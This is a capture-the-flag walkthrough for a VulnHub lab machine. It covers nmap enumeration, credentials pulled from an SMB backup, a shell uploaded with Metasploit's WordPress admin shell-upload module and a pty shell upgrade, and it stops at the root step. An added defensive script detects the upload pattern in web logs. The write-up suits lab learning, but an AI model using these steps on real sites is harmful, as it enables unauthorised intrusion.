Hello friends, hope you are all doing great. This is a walkthrough for the machine KB-VULN:2, which is a good start for beginners. The machine was created by Machineboy and you can simply download it from VulnHub.

#Make sure to add the machine's address to your hosts file.

#nmap

$nmap -sV kb.vuln
Nmap scan report for kb.vuln (192.168.1.6)
Host is up (0.00031s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Tried anonymous login with FTP but it doesn't work. Port 80 is also open, so ran dirb and got the following result.

$dirb http://kb.vuln

Tried to brute-force the WordPress login, but no luck. Then noticed the Samba service and dug into it at smb://kb.vuln, and got a username and password in backup.zip, which contains remerber_me.txt.

Username:admin
Password:MachineBoy141

#exploitation

Now that we have credentials, we can try different ways to upload a backdoor. Here is one of the simplest ways to upload a shell, using metasploit-framework.

msf> use exploit/unix/webapp/wp_admin_shell_upload
msf> show options
msf> set rhosts kb.vuln
(set all the required options)
msf> run
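
For the defending side, this step leaves a recognizable trail in the web server access log: a POST to the WordPress plugin installer followed shortly by a direct request to a PHP file under wp-content/plugins from the same client. The script below is an added example, not part of the original walkthrough; the log lines, the /wordpress path, the IP addresses and the 5-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-format log lines (not from the original page).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /wordpress/wp-content/plugins/aBcDeF/xYz.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:11:00:00 +0000] "GET /wordpress/wp-content/plugins/akismet/akismet.php HTTP/1.1" 403 0 "-" "curl/8.0"
"""

# client IP, timestamp, method, request path, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# WordPress plugin installer endpoint (upload of a plugin zip by an admin)
UPLOAD_RE = re.compile(r"/wp-admin/update\.php\?(?:.*&)?action=upload-plugin")
# Direct request to a PHP file inside a plugin directory
PLUGIN_PHP_RE = re.compile(r"/wp-content/plugins/[^/]+/[^/?]+\.php")


def find_upload_then_exec(log_text, window=timedelta(minutes=5)):
    """Return (ip, upload_time, php_path) tuples where a plugin upload is
    followed, within `window`, by a direct plugin PHP request from the same IP."""
    last_upload = {}  # client IP -> time of its most recent plugin upload
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, path, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and UPLOAD_RE.search(path):
            last_upload[ip] = when
        elif PLUGIN_PHP_RE.search(path) and ip in last_upload:
            if timedelta(0) <= when - last_upload[ip] <= window:
                hits.append((ip, last_upload[ip].isoformat(), path))
    return hits


if __name__ == "__main__":
    for ip, when, path in find_upload_then_exec(SAMPLE_LOG):
        print(f"ALERT {ip} uploaded a plugin at {when} then requested {path}")
```

A legitimate admin installing a plugin also hits the upload endpoint, so treat a match as a lead to review (who logged in, from where, what was uploaded) rather than as proof of compromise.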

#user

Got a shell! The first flag is in the kbadmin folder, which the www-data user is able to read; we also already have the credentials kbadmin:MachineBoy141.

Use a Python TTY with python -c 'import pty; pty.spawn("/bin/sh")', then cd /home/kbadmin and get the user flag.

#root

for root simply tried sudo -l
